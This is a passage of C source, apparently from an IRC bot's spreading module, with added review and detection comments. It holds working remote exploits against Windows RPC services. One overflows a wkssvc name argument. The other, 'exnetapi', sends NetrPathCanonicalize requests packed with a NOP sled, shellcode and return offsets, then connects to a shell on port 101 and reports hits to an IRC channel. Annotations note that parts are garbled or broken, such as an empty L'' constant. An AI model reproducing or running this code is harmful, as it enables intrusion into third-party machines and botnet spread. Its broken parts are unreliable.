		nPacketSize += 2; // NetValidateName = NameType

	// alloc packet
	pPacket = (unsigned char*)malloc( nPacketSize );
	if( !pPacket )
	{
		CloseHandle( hPipe );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	memset( pPacket, 0, nPacketSize );

	// build packet
	nPacketPos = 0;

	// - szWKSSVCUnknown1 (blob defined elsewhere)
	memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
	nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;

	// - wszNetbiosTarget as a counted UNICODE string: length/maxlength in wide chars, terminator included
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszNetbiosTarget ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
	nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );

	// - align to 4 bytes
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWKSSVCUnknown2 (only for the opnum-27 variant)
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
		nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
	}

	// - wszExploitsData: the oversized name argument, same counted-string framing as above
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszExploitsData ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
	nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );

	// - align to 4 bytes
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWSSKVCUnknown3 (only eight 0x00s)
	memset( &pPacket[ nPacketPos ], 0, 8 );
	nPacketPos += 8;

	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		// NetAddAlternateComputerName: Reserved = 0 (DWORD)
		*(DWORD*)&pPacket[ nPacketPos ] = 0;
		nPacketPos += sizeof( DWORD );
	}
	else
	{
		// NetValidateName: NameType = NetSetupMachine (1), 16-bit
		*(unsigned short*)&pPacket[ nPacketPos ] = 1;
		nPacketPos += 2;
	}

	// header
	memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
	ReqNormalHeader.NormalHeader.versionmaj		= 5;
	ReqNormalHeader.NormalHeader.versionmin		= 0;
	ReqNormalHeader.NormalHeader.type			= 0;	// request
	ReqNormalHeader.NormalHeader.flags			= 3;	// first + last fragment; rewritten per fragment by SendReqPacket_Part
	ReqNormalHeader.NormalHeader.representation	= 0x00000010; // little endian
	ReqNormalHeader.NormalHeader.authlength		= 0;
	ReqNormalHeader.NormalHeader.callid			= 1;
	ReqNormalHeader.prescontext					= 0;
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		ReqNormalHeader.opnum					= 27;	// NetrAddAlternateComputerName
	else
		ReqNormalHeader.opnum					= 25;	// NetrValidateName2
	// send
	// fragmented at 4280 bytes (the bind's maxtsize); nPacketSize, not nPacketPos, is the length sent
	if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
	{
		CloseHandle( hPipe );
		free( pPacket );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// =======
	
	// clean up
	// =================
	CloseHandle( hPipe );
	free( pPacket );
	fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );

	// NOTE(review): buffer is never initialised – the formatting call below is commented out –
	// so the IRC message and the log line contain whatever was on the stack
	char buffer[ IRCLINE ];
	//_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
	irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	addlog(buffer);
	exploit[exinfo.exploit].stats++;	// counted as a hit without checking whether anything happened

	return TRUE;
}
Example #5
/**
 * Send crafted NetrPathCanonicalize requests (opnum 0x1f) to exinfo.ip through
 * \\host\pipe\browser and, once the service stops answering, call ConnectShell() for port 101.
 *
 * Steps as written: anonymous ("", "") session to \\host\ipc$; open the pipe for overlapped
 * read/write; RPC bind to 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3 (srvsvc, UUID bytes at
 * Interface1); build a path of Targets[ nTarget ].nPathLen bytes filled with 0x90 that
 * carries the stack/scode blobs at nShellCodeAddr and the nOffset1/nOffset2 values at
 * nOffsetStartAddr (blobs and values are defined elsewhere); wrap it between PStart and
 * PEnd as a counted UNICODE string; send the request up to MAX_TRIES times, issuing an
 * overlapped read after each one. A read that times out (TRY_TIMEOUT) is taken to mean
 * the request had its effect, and ConnectShell( exinfo, 101 ) is attempted.
 *
 * @param exinfo   scan context: ip and exploit index.
 * @param nTarget  index into Targets[] (bIsWinXP, nPathLen, nShellCodeAddr, nOffsetStartAddr).
 * @return true only when a read timed out and the ConnectShell branch ran; false otherwise.
 *
 * NOTE(review): the `return false` inside the retry loop skips CloseHandle( hPipe ),
 * free( pPacket ) and CloseHandle( ov.hEvent ), so all three leak on that path.
 * NOTE(review): hPipe is opened with FILE_FLAG_OVERLAPPED, yet the bind WriteFile and the
 * first ReadFile pass a NULL OVERLAPPED, which Win32 documents as invalid for such handles;
 * the ReadFile's result is dropped, so a rejected bind is never noticed.
 * NOTE(review): `L''` is an empty character constant and does not compile as written;
 * it is probably garbled in this copy (a single wide character was presumably intended).
 * Detection notes: anonymous IPC$ session, open of \pipe\browser, bind to the srvsvc UUID,
 * repeated opnum 0x1f requests whose path argument is nPathLen bytes of mostly 0x90,
 * and a connection attempt to port 101 on the host shortly after the service goes silent.
 */
BOOL exnetapi (EXINFO exinfo, int nTarget)
{
	char szIPC[ 8192 ];
	NETRESOURCE NetSource;
	DWORD nNullSessionError;	// assigned below but never examined
	char szPipe[ 8192 ];
	HANDLE hPipe;
	RPC_ReqBind BindPacket;
	DWORD nBytesWritten;
	DWORD nBytesRead;
	unsigned char RecvBuff[ 8192 ];
	NetrPathCanonicalize_Start PStart;
	NetrPathCanonicalize_End PEnd;
	size_t nPathLen;
	size_t nBufferPos;
	unsigned char *pPath;
	size_t nPacketSize;
	unsigned char *pPacket;
	RPC_ReqNorm ReqNormalHeader;
	bool bExit;
	int nCount;
	OVERLAPPED ov;
	// anonymous ("" user, "" password) connection to \\host\ipc$ unless the target is the local machine (".");
	// the session is never cancelled again in this routine
	if( _stricmp( exinfo.ip, "." ) )
	{
		_snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", exinfo.ip );
		memset( &NetSource, 0 ,sizeof( NetSource ) );
		NetSource.lpRemoteName = szIPC;
		nNullSessionError = fWNetAddConnection2( &NetSource, "", "", 0 );
	}
	// \\host\pipe\browser, read/write, overlapped I/O (used for the timed read in the loop below)
	_snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\browser", exinfo.ip );
	hPipe = CreateFile( szPipe,
		GENERIC_WRITE | GENERIC_READ,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_FLAG_OVERLAPPED,
		NULL );
	if( hPipe == INVALID_HANDLE_VALUE )
		return false;
	// RPC bind (type 11), first + last fragment, little-endian NDR
	memset( &BindPacket, 0, sizeof( BindPacket ) );
	BindPacket.NormalHeader.versionmaj		= 5;
	BindPacket.NormalHeader.versionmin		= 0;
	BindPacket.NormalHeader.type			= 11;
	BindPacket.NormalHeader.flags			= 3;
	BindPacket.NormalHeader.representation	= 0x00000010;
	BindPacket.NormalHeader.fraglength		= sizeof( BindPacket );
	BindPacket.NormalHeader.authlength		= 0;
	BindPacket.NormalHeader.callid			= 0;
	BindPacket.maxtsize						= MAX_FRAG_SIZE;	// same constant is the fragment size used by SendReqPacket_Part below
	BindPacket.maxrsize						= MAX_FRAG_SIZE;
	BindPacket.assocgid						= 0;
	BindPacket.numelements					= 1;
	BindPacket.contextid					= 0;
	BindPacket.numsyntaxes					= 1;
	// abstract syntax: srvsvc, 4b324fc8-1670-01d3-1278-5a47bf6ee188 (bytes in little-endian GUID order)
	memcpy( BindPacket.Interface1.byte, "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88", 16 );
	BindPacket.Interface1.version			= 3;
	// transfer syntax: NDR, 8a885d04-1ceb-11c9-9fe8-08002b104860
	memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
	BindPacket.Interface2.version			= 2;
	// NULL OVERLAPPED on an overlapped handle – see the review note in the header
	if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
	{
		CloseHandle( hPipe );
		return false;
	}
	// bind_ack is read into RecvBuff and discarded; the return value is not checked
	ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, NULL );
	// randomised filler for the fields that are not meaningful to the request
	srand( (int)time( NULL ) );
	memset( &PStart, 0x41, sizeof( PStart ) );
	memset( &PEnd, 0x41, sizeof( PEnd ) );
	PStart.ReferendID		= rand();
	PStart.Server.length	= 1;	// ServerName: one wide char (the terminator only)
	PStart.Server.offset	= 0;
	PStart.Server.maxlength = 1;
	PStart.Server_Data		= L'';	// NOTE(review): empty character constant, see header
	// Prefix argument differs per target: 1 wide char of 0x0000 on XP, 2 wide chars starting with 0xeb 0x02 otherwise
	if( Targets[ nTarget ].bIsWinXP )
	{
		PEnd.Prefix.length		= 1;
		PEnd.Prefix.offset		= 0;
		PEnd.Prefix.maxlength	= 1;
		memcpy( PEnd.Prefix_Data, "\x00\x00\x00\x00", 4 );
	}
	else
	{
		PEnd.Prefix.length		= 2;
		PEnd.Prefix.offset		= 0;
		PEnd.Prefix.maxlength	= 2;
		memcpy( PEnd.Prefix_Data, "\xeb\x02\x00\x00", 4 );
	}
	PEnd.OutBufLen			= rand() % 250 + 1;	// 1..250, random per run
	PEnd.Type				= rand() % 250 + 1;;	// stray second semicolon is an empty statement
	PEnd.Flags				= 0;
	// path argument: nPathLen bytes of 0x90 with a two-byte (wide NUL) terminator
	nPathLen = Targets[ nTarget ].nPathLen;
	pPath = (unsigned char*)malloc( nPathLen );
	if( !pPath )
	{
		CloseHandle( hPipe );
		return false;
	}
	memset( pPath, 0x90, nPathLen - 2 );
	memset( pPath + nPathLen - 2, 0, 2 );
	// stack and scode blobs (defined elsewhere) at the per-target offset; sizeof - 1 drops the terminators
	nBufferPos = Targets[ nTarget ].nShellCodeAddr;
	memcpy( pPath + nBufferPos, stack, sizeof( stack ) - 1 );
	nBufferPos += sizeof( stack ) - 1;
	memcpy( pPath + nBufferPos, scode, sizeof( scode ) - 1 );
	nBufferPos += sizeof( scode ) - 1;
	// nOffset1/nOffset2 values (defined elsewhere) at the per-target offset, layout differs per target
	nBufferPos = Targets[ nTarget ].nOffsetStartAddr;
	if( Targets[ nTarget ].bIsWinXP )
	{
		// NOTE(review): copies nOffset2 using sizeof( nOffset1 ); fine only if both have the same size
		memcpy( pPath + nBufferPos, &nOffset2, sizeof( nOffset1 ) );
		nBufferPos += 4;
		nBufferPos += 8;
		memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
		nBufferPos += 4;
		nBufferPos += 32;
		memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
		nBufferPos += 4;
		nBufferPos += 8;
		memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
		nBufferPos += 4;
		nBufferPos += 32;
		nBufferPos += sizeof( wchar_t );
	}
	else
	{
		// 16 consecutive copies of nOffset1
		for( size_t n = 0; n < 16; n++ )
			memcpy( pPath + nBufferPos + ( n * sizeof( nOffset1 ) ), &nOffset1, sizeof( nOffset1 ) );
	}
	// stub size: PStart, counted-string header, path (+ terminator and up to 4 bytes of padding), PEnd
	nPacketSize = 
		  sizeof( PStart )
		+ sizeof( UNISTR2 )
		+ nPathLen + sizeof( wchar_t ) + 4
		+ sizeof( NetrPathCanonicalize_End );
	pPacket = (unsigned char*)malloc( nPacketSize );
	if( !pPacket )
	{
		CloseHandle( hPipe );
		free( pPath );
		return false;
	}
	memset( pPacket, 0, nPacketSize );
	nBufferPos = 0;
	memcpy( pPacket, &PStart, sizeof( PStart ) );
	nBufferPos += sizeof( NetrPathCanonicalize_Start );
	// counted UNICODE string header: length in wide chars, rounded up (float ceil on an integer quantity)
	( (UNISTR2*)( pPacket + nBufferPos ) )->length		= (UINT32)ceil( (float)nPathLen / sizeof( wchar_t ) );
	( (UNISTR2*)( pPacket + nBufferPos ) )->offset		= 0;
	( (UNISTR2*)( pPacket + nBufferPos ) )->maxlength	= ( (UNISTR2*)( pPacket + nBufferPos ) )->length;
	nBufferPos += sizeof( UNISTR2 );
	memcpy( pPacket + nBufferPos, pPath, nPathLen );
	nBufferPos += nPathLen;
	// NDR 4-byte alignment before the trailing struct
	while( nBufferPos % 4 )
		nBufferPos++;
	memcpy( pPacket + nBufferPos, &PEnd, sizeof( PEnd ) );
	nBufferPos += sizeof( PEnd );	// nBufferPos is now the stub length actually sent
	free( pPath );
	// request header: callid 0, opnum 0x1f; flags are rewritten per fragment by SendReqPacket_Part
	memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
	ReqNormalHeader.NormalHeader.versionmaj		= 5;
	ReqNormalHeader.NormalHeader.versionmin		= 0;
	ReqNormalHeader.NormalHeader.type			= 0;
	ReqNormalHeader.NormalHeader.flags			= 3;
	ReqNormalHeader.NormalHeader.representation	= 0x00000010;
	ReqNormalHeader.NormalHeader.authlength		= 0;
	ReqNormalHeader.NormalHeader.callid			= 0;
	ReqNormalHeader.prescontext					= 0;
	ReqNormalHeader.opnum						= 0x1f;	// NetrPathCanonicalize
	// manual-reset event for the overlapped read; if CreateEvent fails the loop just resends MAX_TRIES times
	memset( &ov, 0, sizeof( ov ) );
	ov.hEvent	= CreateEvent( NULL, TRUE, FALSE, NULL );
	bExit		= false;
	nCount		= 0;
	while( !bExit && nCount < MAX_TRIES )
	{
		nCount++;
		// send the stub (nBufferPos bytes) fragmented at MAX_FRAG_SIZE; a send failure ends the loop with bExit still false
		if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nBufferPos, MAX_FRAG_SIZE, true ) )
			break;
		if( ov.hEvent )
		{
			
			// NOTE(review): this return leaks hPipe, pPacket and ov.hEvent
			if( !ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, &ov ) && GetLastError() != ERROR_IO_PENDING )
				return false;
			else
			{
				// no reply within TRY_TIMEOUT is treated as success; a reply means "try again"
				if( WaitForSingleObject( ov.hEvent, TRY_TIMEOUT ) == WAIT_TIMEOUT )
				{
					bExit = true;
					ConnectShell (exinfo, 101);	// hard-coded port 101; result not checked
					exploit[exinfo.exploit].stats++;
				}
			}

		}
	}
	CloseHandle( hPipe );
	free( pPacket );
	if( ov.hEvent )
		CloseHandle( ov.hEvent );
	if (bExit)
		return true;
	return false;
}